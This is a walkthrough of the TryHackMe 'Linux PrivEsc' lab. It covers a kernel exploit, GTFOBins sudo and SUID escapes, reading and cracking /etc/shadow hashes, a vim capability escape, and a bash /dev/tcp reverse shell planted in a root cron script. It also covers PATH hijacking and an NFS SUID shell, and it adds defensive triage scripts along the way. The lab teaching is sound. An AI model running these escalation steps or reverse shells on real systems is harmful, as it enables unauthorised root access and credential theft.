# Linux PrivEsc

This room can be found [here](https://tryhackme.com/room/linprivesc). It covers a few methods of escalating from a normal user to the root user on a Linux system.

## Task 3

This task has us launch a machine and access it via the browser **OR** ssh into the machine with the username `karen` and password `Password1`.

Enumeration is typically one of the first steps you take after gaining access to a system.

### Question 1: What is the hostname of the target system?

`wade7363` - We run `hostname` to find our answer.

### Question 2: What is the Linux kernel version of the target system?

`3.13.0-24-generic` - We can run `uname -a` to find this info (`uname -r` prints just the kernel release).

### Question 3: What Linux is this?

`Ubuntu 14.04 LTS` - We can run `cat /etc/issue` OR `cat /etc/os-release` to find this.

### Question 4: What version of the Python language is installed on the system?

`2.7.6` - Running `python -V` will show this info

### Question 5: What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)

`CVE-2015-1328` - If we search our kernel version, `3.13.0-24-generic`, on Exploit-DB we find [this overlayfs exploit](https://www.exploit-db.com/exploits/37292) for CVE-2015-1328.

## Task 5

This task has us exploit the vulnerability found in Task 3 to gain access to the root account. We will obtain the exploit as a .c file, get it onto the victim machine, compile it, run it, and become root.

### Question 1: What is the content of the flag1.txt file?

`THM-28392872729920` - After downloading the .c exploit from Task 3, we can get it onto our victim machine however we can. A common way is to serve it from a Python web server on the attacking machine (for example `python3 -m http.server`) and fetch it from the victim.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Frkks6h2fC67eqqszLzxq%2Fimage.png?alt=media\&token=17e8339a-fe39-4f1e-9217-1e07f8d57805)

Now we can `wget` the file to the `/tmp/` directory on the victim

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FZLV2rLAUYxFfG9wrOqzZ%2Fimage.png?alt=media\&token=16720a6f-24fb-42e5-9c6a-464ceee21444)

Now we need to compile the code with `gcc pwn.c -o pwned` (the target needs `gcc` installed, which this one has) and execute the new file with `./pwned`.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fv5U9muHNukRpXkDqAhip%2Fimage.png?alt=media\&token=7fe9d0d6-80c1-4ac9-8be0-c7f5fc1ce92d)

We verify we have escalated our privilege and are the root user with `whoami`. We should see root.

To find the flag I ran `find / -name 'flag*.txt'` (quote the pattern so the shell does not expand the glob before `find` sees it).

We can now `cat` the file to receive our flag.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FFpx4htYBu0ZN8Tw2QPvX%2Fimage.png?alt=media\&token=2a63d824-92de-49e9-88bb-6edf656240e3)

## Task 6

### Question 1: How many programs can the user "karen" run on the target system with sudo rights?

`3` - We can run `sudo -l` to find this answer. She has sudo access to `find`, `less`, and `nano`.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fkd0Ip0qW8PZCjLqGRV6r%2Fimage.png?alt=media\&token=4ce6b4bb-9cb9-40cb-bb22-de033959980d)

### Question 2: What is the content of the flag2.txt file?

`THM-402028394` - We can look on [GTFOBins](https://gtfobins.github.io/) for ways to abuse the commands Karen is allowed to run with sudo. Looking up `find` we see:

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fljwg1fMnWY3OhI5YlCIm%2Fimage.png?alt=media\&token=75123bf2-5299-4a00-9929-9c5dcad10520)

So let's run `sudo find . -exec /bin/sh \; -quit` and see if we get root. The backslash before the `;` matters: without it the shell treats `;` as a command separator and `find` complains that `-exec` is missing its terminator.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FsjSelB3iQz8q4HYuVmgC%2Fimage.png?alt=media\&token=1421e83e-8630-4386-9a83-82c0fd8f412f)

We do! So now we can find our flag.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FfDp2nrD4ZKF8DmtHijhO%2Fimage.png?alt=media\&token=70ebac3a-bbb6-4cac-aeee-045d0fa867b5)

### Question 3: How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

`sudo nmap --interactive` - Searching for Nmap on [GTFOBins](https://gtfobins.github.io/gtfobins/nmap/) will give us our answer. Note that interactive mode only exists in older Nmap releases (GTFOBins lists versions 2.02 to 5.21); on a newer Nmap the same entry shows how to get a shell by running a Lua script with `--script`.

### Question 4: What is the hash of frank's password?

`$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1` - The `/etc/shadow` file contains each user's password hash and password-ageing information. It is readable only by root, so now that we are root we can `cat` it and pull out Frank's hash.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FVOb9buF0ph5gCJuD78hE%2Fimage.png?alt=media\&token=1b41c75c-ee8f-4065-af74-d48e66db2941)

## Task 7

### Question 1: Which user shares the name of a great comic book writer?

`gerryconway` - As in Task 6 we would like to list users, but this time we are not root and cannot read `/etc/shadow`. `/etc/passwd` is world-readable, though, and lists every account.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FHjIwdk2K9ElxrErGuf1E%2Fimage.png?alt=media\&token=d247eebe-ab81-4809-82dc-02ee5347ef91)

Be sure to copy the contents of the /etc/passwd file to a .txt file on the attacking machine; `unshadow` will need it later.

### Question 2: What is the password of user2?

`Password1` - The room lets us know we can run `find / -type f -perm -04000 -ls 2>/dev/null` to list files with the SUID bit set. After looking through this list and comparing it to [GTFOBins](https://gtfobins.github.io/#+suid), I find one they have in common: base64.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F4AjrXqf1noPPa7jusbq2%2Fimage.png?alt=media\&token=d34a6bb4-6290-4010-9b2b-e1785891736c)

Because base64 is SUID root, it opens any file with root's privileges. Encoding the file and immediately decoding it gives back the original contents, so this is effectively `cat` as root. Since we are after the user's password, we want to see the `/etc/shadow` file.

`LFILE=/etc/shadow`

`base64 "$LFILE" | base64 --decode`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F7wLSM2XbsEgfcyZw73P0%2Fimage.png?alt=media\&token=37baa7ee-8727-4694-86ef-5d64bba7bd47)

Now we can use `unshadow` from the John the Ripper package to combine the two files into one line per user (`unshadow passwd.txt shadow.txt > unshadowed.txt`).

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FqnB7WYJ3jcqcmBAixCS4%2Fimage.png?alt=media\&token=68934179-7c0b-4d53-beed-a5f4f0058a3d)

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FUCGEu9nhh48zLpdCtZXY%2Fimage.png?alt=media\&token=0e22453f-20df-4941-b8a8-14cecaaaeff5)

Time to crack the passwords!

`john --wordlist=<WORDLIST> <FILE>`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F63gJAiCCpOwMmwCRXhrq%2Fimage.png?alt=media\&token=20f9bc5e-7e24-4e9e-b034-b8054e595e1a)

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FHmKWyQ3K97wtirpdJio7%2Fimage.png?alt=media\&token=666eb4d5-0ca2-4a6b-99a8-77e0b06ed9f9)
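`unshadow` just joins the two files on the username and swaps passwd's `x` for the shadow hash, and john's first job is to recognise the hash type from its `$id$` prefix. As an added example (not part of the room, and not John the Ripper's own code), here is that join done with awk, a helper that names the crypt algorithm from the prefix, and a count of how many entries are actually crackable. The passwd and shadow lines are constructed; the hashes in them are not real.

```sh
#!/bin/sh
# Added example: a minimal "unshadow" in awk, plus hash-type triage.
# Not the room's code; the passwd/shadow lines below are constructed.

# unshadow_files PASSWD SHADOW
# Prints passwd-format lines with field 2 replaced by the shadow hash.
# Users with no shadow entry are printed unchanged, mirroring unshadow(8).
unshadow_files() {
    awk -F: -v OFS=: '
        NR == FNR { hash[$1] = $2; next }   # first file (shadow): user -> hash
        ($1 in hash) { $2 = hash[$1] }       # second file (passwd): substitute
        { print }
    ' "$2" "$1"
}

# hash_algo HASH -> prints the crypt(3) algorithm named by the $id$ prefix
hash_algo() {
    case "$1" in
        '$6$'*)          echo sha512crypt ;;
        '$5$'*)          echo sha256crypt ;;
        '$1$'*)          echo md5crypt ;;
        '$y$'*)          echo yescrypt ;;
        '$2'[abxy]'$'*)  echo bcrypt ;;
        '!'*|'*')        echo locked ;;      # no usable password
        *)               echo unknown ;;
    esac
}

# count_crackable UNSHADOWED_FILE -> number of lines carrying a real hash
count_crackable() {
    awk -F: '$2 ~ /^\$/ { n++ } END { print n+0 }' "$1"
}

# --- constructed sample data (not from the target) ---
demo_unshadow() {
    dir=$(mktemp -d)
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user2:x:1001:1001::/home/user2:/bin/bash
EOF
    cat > "$dir/shadow" <<'EOF'
root:$6$saltsalt$fakehashfakehashfakehash:18785:0:99999:7:::
daemon:*:18785:0:99999:7:::
user2:$6$othersalt$anotherfakehashvalue:18785:0:99999:7:::
EOF
    unshadow_files "$dir/passwd" "$dir/shadow" > "$dir/unshadowed"
    cat "$dir/unshadowed"
    rm -rf "$dir"
}
```

`demo_unshadow` prints the merged file; feed the real output to `john --wordlist=... unshadowed.txt` as above. Entries whose hash field is `*` or starts with `!` are locked accounts and are not worth cracking time.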

### Question 3: What is the content of the flag3.txt file?

`THM-3847834` - Since the SUID base64 lets us read any file as root, we can read the flag with the same method.

Running `find / -name flag3.txt 2>/dev/null` reveals it is under `/home/ubuntu/`, so cd to that directory and read it the same way.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FPM0xnUGKyQs9sak1TOJv%2Fimage.png?alt=media\&token=be485c25-887a-4d0e-85de-7638d62c3eb0)

## Task 8

This task focuses on Linux capabilities as a route to root. Karen can run a copy of vim that has a capability set on it, and nothing else special; this task shows how that capability can be leveraged to become root.

### Question 1: How many binaries have set capabilities?

`6` - Running `getcap -r / 2>/dev/null` will give us our answer. If we ran this without the `2>/dev/null` we would also see a lot of permission-denied errors for directories we cannot read.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FMOtFLNCYZIUk0VoObCEw%2Fimage.png?alt=media\&token=49c797f1-1d72-429f-a561-724099bca1fb)
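With six binaries you can read the `getcap` output by eye; on a bigger host you want the capabilities that matter pulled out for you. Added example, not the room's code: a function that reads `getcap -r` output in both the older `path = caps+ep` and newer `path caps=ep` formats and flags capabilities that GTFOBins-style escapes turn into root (setuid/setgid, dac_override/dac_read_search, sys_admin, sys_ptrace, sys_module, chown, fowner). The sample lines are constructed to resemble this task's output.

```sh
#!/bin/sh
# Added example (not from the room): triage getcap -r output for
# capabilities that a local user can turn into root. Sample lines are
# constructed; on a real host pipe in `getcap -r / 2>/dev/null`.

# Capabilities worth a GTFOBins lookup when set as effective (+ep / =ep).
DANGEROUS_CAPS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner'

# triage_caps < getcap-output
# Emits "path<TAB>cap" for each dangerous cap; handles both
#   /path = cap_setuid+ep        (libcap < 2.41)
#   /path cap_setuid=ep          (libcap >= 2.41)
triage_caps() {
    awk -v list="$DANGEROUS_CAPS" '
        BEGIN { n = split(list, d, " "); for (i = 1; i <= n; i++) bad[d[i]] = 1 }
        NF == 0 { next }
        {
            path = $1
            caps = ($2 == "=") ? $3 : $2        # old format has a literal "="
            sub(/[+=][a-z]+$/, "", caps)        # drop the +ep / =ep flag suffix
            m = split(caps, c, ",")             # several caps may share one suffix
            for (i = 1; i <= m; i++) if (c[i] in bad) print path "\t" c[i]
        }'
}

# count_dangerous < getcap-output -> number of flagged (path, cap) pairs
count_dangerous() { triage_caps | wc -l | tr -d ' '; }

# Constructed sample, mixing both output formats.
sample_getcap() {
    cat <<'EOF'
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
/usr/bin/python3.8 cap_dac_read_search,cap_setuid=ep
EOF
}

demo_caps() { sample_getcap | triage_caps; }
```

`cap_net_raw` on ping is normal and is left alone; the two vim copies and the python binary come out as the ones to look up. On a live host run `getcap -r / 2>/dev/null | triage_caps`.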

### Question 2: What other binary can be used through its capabilities?

`view` - Since we can see that Karen can use vim, we look through [GTFOBins](https://gtfobins.github.io/gtfobins/vim/) for a way to escalate. If we `ls` we see karen has a `vim` binary in her home directory; that copy, not the system one in `/usr/bin/`, is the one the capability is set on, so that is the one we must run (`getcap` lists it, along with `view`).

After testing the first two shell options, I found the third option worked: `./vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'`. Running THIS vim rather than the one inside of `/usr/bin/` will get us our root shell. Note that GTFOBins' capabilities entry for vim adds `os.setuid(0)` before `os.execl(...)`; that call is what turns `cap_setuid` into a real root uid, so if the shell comes back as karen, use `./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'` instead.

### Question 3: What is the content of the flag4.txt file?

`THM-9349843` - After obtaining root, we can find the file location, cat it, obtaining our answer.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fa3lWodF3w0WEtmE29Itm%2Fimage.png?alt=media\&token=8e0b8ac3-83f1-40bf-add6-b81f1c3e8fcf)

## Task 9

In this task we figure out how to leverage cron jobs (scheduled tasks) to become root.

### Question 1: How many user-defined cron jobs can you see on the target system?

`4` - We can look at `/etc/crontab` to find this answer. The file is world-readable, so any user can see which scripts root runs on a schedule.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F6DLM8QRa6wuQOhxvh33a%2Fimage.png?alt=media\&token=568e2182-28df-4290-b962-8832e6e1aa78)

### Question 2: What is the content of the flag5.txt file?

`THM-383000283` - If we `ls` we see we have a `backup.sh` file, which is also listed in the `crontab`. Look at the contents of `backup.sh` and make a backup of it with `cp backup.sh backup.sh.bak`. Looking at the original with `ls -l`, we notice it is not executable, so fix that with `chmod +x backup.sh`. Now edit the script and add a reverse shell command. Make sure the first line is `#!/bin/bash`: `/dev/tcp` is a bash feature, and a script run through plain `sh` would not open the connection.

`bash -i >& /dev/tcp/<OUR_MACHINE_IP>/<PORT> 0>&1`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FAMbh3xz9RYjKz3cd2uPy%2Fimage.png?alt=media\&token=9caae41a-7244-46d2-8f47-a902426a05b2)

In another terminal we can start our netcat listener with `nc -lvnp <PORT>`, using the same port as in the script.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FOS9sDw7lJL5QKDBTLoY3%2Fimage.png?alt=media\&token=6586aa26-43db-4d5e-8396-5e77d6de7050)

Now we wait for the crontab to run. After a minute or two, we should receive our root shell.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fx8eEY6AjKQDpDJ2SepHy%2Fimage.png?alt=media\&token=a327c9ae-4a42-464e-8f57-3b8138dab8bb)

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FKXRILs5PblSHRcOfy8WE%2Fimage.png?alt=media\&token=fcff0322-d8f0-4391-993f-4269344bd1d8)
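The check that makes this attack obvious is: for each root cron entry, can the current user write the script it runs, or the directory it lives in? Added example, not the room's code: a parser for the system crontab format (`min hour dom mon dow user command`) that skips comments and variable assignments and reports writable targets. The crontab and scripts are constructed in a temporary directory; point `writable_cron_targets` at `/etc/crontab` on a real host.

```sh
#!/bin/sh
# Added example (not the room's code): find system-crontab entries whose
# command file is writable by us. Everything below runs against a
# constructed crontab and scripts in a temp dir, not the real /etc/crontab.

# cron_commands CRONTAB_FILE
# Prints "user<TAB>command" for each job line, skipping comments,
# blank lines and VAR=value assignments.
cron_commands() {
    awk '
        /^[ \t]*(#|$)/ { next }                        # comment or blank
        /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }      # SHELL=, PATH=, MAILTO=
        NF >= 7 {
            cmd = $7
            for (i = 8; i <= NF; i++) cmd = cmd " " $i
            print $6 "\t" cmd
        }' "$1"
}

# writable_cron_targets CRONTAB_FILE
# For each job, take the first word of the command; if it is a file we
# can write, or lives in a directory we can write (replace/rename attack),
# print "user<TAB>path<TAB>reason".
writable_cron_targets() {
    cron_commands "$1" | while IFS="$(printf '\t')" read -r user cmd; do
        target=${cmd%% *}                              # first word only
        case "$target" in /*) ;; *) continue ;; esac   # skip bare names like "cd"
        if [ -w "$target" ]; then
            printf '%s\t%s\t%s\n' "$user" "$target" "file-writable"
        elif [ -w "$(dirname "$target")" ]; then
            printf '%s\t%s\t%s\n' "$user" "$target" "dir-writable"
        fi
    done
}

# --- constructed demo: one writable script, one locked down, one missing ---
demo_cron() {
    d=$(mktemp -d)
    mkdir -p "$d/locked" "$d/open"
    printf '#!/bin/sh\necho ok\n' > "$d/open/backup.sh"
    printf '#!/bin/sh\necho ok\n' > "$d/locked/rotate.sh"
    chmod 755 "$d/open/backup.sh"
    chmod 555 "$d/locked/rotate.sh"; chmod 555 "$d/locked"
    cat > "$d/crontab" <<EOF
# /etc/crontab: system-wide crontab (constructed)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    $d/open/backup.sh
* *     * * *   root    $d/locked/rotate.sh
* *     * * *   root    /nonexistent/missing.sh
EOF
    writable_cron_targets "$d/crontab"
    chmod 755 "$d/locked"; rm -rf "$d"
}
```

`backup.sh` in the writable directory is reported; the missing script is not (its directory does not exist either). The `-w` tests use the caller's identity, so run the check as the low-privilege user you actually have, not as root.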

### Question 3: What is Matt's password?

`123456` - Running `grep matt /etc/shadow` as root will give us his hash. Copy that to a .txt file and crack it with john as before.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FhYbl0ASlClFQKKK9RMUo%2Fimage.png?alt=media\&token=590de82c-4845-465e-9a7d-f233703e5894)

## Task 10

### Question 1: What is the odd folder you have write access for?

`/home/murdoch` - Running `find / -writable 2>/dev/null | grep home | cut -d "/" -f 2,3 | sort -u` will show us our answer: it lists every writable path, keeps the ones under `/home`, trims each to its first two components and removes duplicates. So we have write access to murdoch's home folder.

### Question 2: What is the content of the flag6.txt file?

`THM-736628929` - The question's hint is: "You can add the writable directory to your user's PATH and create a file named `thm` that the `./test` executable will read. The `thm` file can simply be a `cat` command that will read the flag file."

First we need to locate the file.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FMymsSWv9R3nPoekojxDF%2Fimage.png?alt=media\&token=ec09ecaa-4bbd-46d4-aee5-5ec7847c5104)

Now we `echo $PATH`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F7CBDKGV97f0mjtZdS4ez%2Fimage.png?alt=media\&token=e739a9f1-28dc-48b4-81f1-ae1c45b5ee50)

Now we add the folder we have write access to at the front of our PATH with `export PATH=/home/murdoch:$PATH` (this only affects the current shell, which is the one that will launch `./test`).

Now we create a file called `thm` under `/home/murdoch` containing `cat /home/matt/flag6.txt`, then make it executable with `chmod +x thm` (execute permission is all that is needed; `777` is more than required).

From here we can run `./test` and obtain our flag.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fn6IbeSrrYqDLmbNIhKfu%2Fimage.png?alt=media\&token=aa0d73ee-4b29-4884-9f3d-f6cd77ca8bc4)
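The reason `./test` can be hijacked is that it looks up `thm` through PATH instead of by absolute path. Added example, not the room's binary or code: a constructed victim script that does the same thing, an attacker-planted `thm` in a writable directory, and a hardened variant that pins PATH and calls the helper by absolute path. Everything lives in a temporary directory and is removed afterwards.

```sh
#!/bin/sh
# Added example (not the room's code): PATH hijacking, shown with a
# constructed "victim" script that behaves like the room's ./test
# (it runs `thm` by bare name) and a hardened variant. All files live
# in a temp directory; nothing touches the real system.

setup_demo() {
    D=$(mktemp -d)
    mkdir -p "$D/bin" "$D/writable"
    # The legitimate tool the victim is meant to run.
    printf '#!/bin/sh\necho legit-thm\n' > "$D/bin/thm"
    # Victim: relies on PATH lookup for "thm" (the bug).
    printf '#!/bin/sh\nthm\n' > "$D/victim"
    # Hardened: fixed PATH and absolute path to the helper.
    printf '#!/bin/sh\nPATH=/usr/bin:/bin\n%s/bin/thm\n' "$D" > "$D/hardened"
    chmod 755 "$D/bin/thm" "$D/victim" "$D/hardened"
    echo "$D"
}

# plant_thm DIR: drop an attacker-controlled "thm" into a writable dir.
# Execute permission is enough; no need for 777.
plant_thm() {
    printf '#!/bin/sh\necho hijacked\n' > "$1/thm"
    chmod 755 "$1/thm"
}

# Run each program with the writable directory first in PATH,
# exactly as `export PATH=/home/murdoch:$PATH` does in the room.
run_victim()   { PATH="$1/writable:$1/bin:$PATH" "$1/victim"; }
run_hardened() { PATH="$1/writable:$1/bin:$PATH" "$1/hardened"; }

# demo_path_hijack -> "legit-thm hijacked legit-thm"
demo_path_hijack() {
    D=$(setup_demo)
    before=$(run_victim "$D")       # no attacker file yet: legit tool runs
    plant_thm "$D/writable"
    after=$(run_victim "$D")        # writable dir is searched first: hijacked
    hard=$(run_hardened "$D")       # absolute path ignores PATH: still legit
    rm -rf "$D"
    printf '%s %s %s\n' "$before" "$after" "$hard"
}
```

The victim is only exploitable because it trusts PATH; the hardened script shows the two fixes that close the hole (reset PATH, call helpers by absolute path), which is what you would recommend to whoever shipped `test`.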

## Task 11

### Question 1: How many mountable shares can you identify on the target system?

`3` - Running `showmount -e <IP>` from the attacking machine will give us our answer.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FHqpZe2iiuqqzEXGXQXz2%2Fimage.png?alt=media\&token=b2c76a47-8873-451c-9f5b-f0b32c2286f2)

### Question 2: How many shares have the "no\_root\_squash" option enabled?

`3` - Running `cat /etc/exports` on the target will give us our answer. This file is the NFS server's export configuration; `no_root_squash` means that root on a client stays root on the share, so a file we create there as root keeps its root ownership and SUID bit.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FONPatVhDiDUnuunygYvG%2Fimage.png?alt=media\&token=b5814c26-bfa9-437e-8bbd-8af686e323e3)
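Added example, not the room's code: a parser for `/etc/exports` that reports which share/client pairs carry `no_root_squash`, handling the bare `(options)` form (which means every host) and multiple clients per line. The exports text is constructed; pipe in the real file with `risky_exports < /etc/exports`.

```sh
#!/bin/sh
# Added example (not from the room): parse /etc/exports and flag shares
# exported with no_root_squash. The exports text below is constructed.

# risky_exports < exports-file
# Prints "share<TAB>client<TAB>options" for entries with no_root_squash.
risky_exports() {
    awk '
        /^[ \t]*(#|$)/ { next }                      # comment or blank
        {
            share = $1
            for (i = 2; i <= NF; i++) {              # one or more client(opts) groups
                client = $i; opts = ""
                if (match(client, /\(.*\)$/)) {      # host(opts) form
                    opts = substr(client, RSTART + 1, RLENGTH - 2)
                    client = substr(client, 1, RSTART - 1)
                }
                if (client == "") client = "*"       # "(opts)" alone means every host
                if (opts ~ /(^|,)no_root_squash(,|$)/)
                    print share "\t" client "\t" opts
            }
        }'
}

# count_no_root_squash < exports-file -> number of flagged share/client pairs
count_no_root_squash() { risky_exports | wc -l | tr -d ' '; }

# Constructed sample: three world-exported shares with no_root_squash,
# one safe share, and one share with a mix of clients.
sample_exports() {
    cat <<'EOF'
# /etc/exports (constructed)
/srv/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/shared (rw,sync,no_root_squash)
/srv/public 10.0.0.0/24(ro,sync,root_squash)
/srv/data 10.0.0.5(rw,no_root_squash) 10.0.0.6(rw,root_squash)
EOF
}
```

A `*` client combined with `no_root_squash` and `rw` is the worst case: any host that can reach the NFS port can write root-owned SUID files into the share.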

### Question 3: What is the content of the flag7.txt file?

`THM-89384012` - We can now mount the NFS share onto our machine (as root) with `mount -o rw <IP>:<SHARE> <MOUNTPOINT>`.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FUEFhLFpDh3a3F7SotMt9%2Fimage.png?alt=media\&token=2bb782bb-aeae-44f8-b4a9-f97c3bd31d64)

The room gives us a short C program that we can compile into a SUID root binary. I made a file nfs.c with the contents (includes added so it compiles cleanly):

```c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setgid(), setuid() */

/* When the binary is owned by root with the SUID/SGID bits set, these
   calls make the real and effective uid/gid 0 before spawning the shell. */
int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
```

Now we can compile it inside the mounted share with `gcc nfs.c -o nfs` (the `-w` in the original command only silenced warnings caused by the missing includes). Do this as root on the attacking machine so the file is owned by root, then set the SUID/SGID bits with `chmod +s nfs`; thanks to `no_root_squash` both the ownership and the bits survive on the server side. If the target's libc is older than yours, add `-static` so the binary does not depend on the target's shared libraries.

We can now execute the file on the target machine from the tmp directory, `cd /tmp && ./nfs`, and obtain root. We can then obtain our flag with `cat /home/matt/flag7.txt`.

## Task 12

* User: leonard
* Password: Penny123

This task uses a lot of the tools and methods from the previous tasks. We can SSH into the machine and begin.

We can use tools such as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS), which was discussed in Task 4, but for now we'll go over the manual methods that were covered.

### Question 1: What is the content of the flag1.txt file?

`THM-42828719920544` -

Started this by looking at the SUID Permissions.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fr0vEnX3raX9c1Xp3kpXw%2Fimage.png?alt=media\&token=544f392c-9121-44cd-9af3-b6d8d211da65)

We can see that base64 is SUID. So, as in Task 7, we can follow the same approach.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F8EXiS9Rp8GwCWCYva7K0%2Fimage.png?alt=media\&token=b8693376-52f7-4c41-b91d-4ab306cb3e3d)

So let's try to read the /etc/shadow file.

`LFILE=/etc/shadow`

`base64 "$LFILE" | base64 --decode`

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FAwQC9FljP2VdIk21bLEM%2Fimage.png?alt=media\&token=098a204c-4d91-4454-a401-fc4128ac1dfc)

We can get the hashes for root, and missy.

`root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::`

`missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::`

We can put these hashes in a .txt file and attempt to crack them.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FbYiPcU1ig7MAB1j1Fvvi%2Fimage.png?alt=media\&token=7b188035-296c-4e43-aa52-688e69bdadae)

We got the password for Missy! So lets switch users to missy. `su missy`

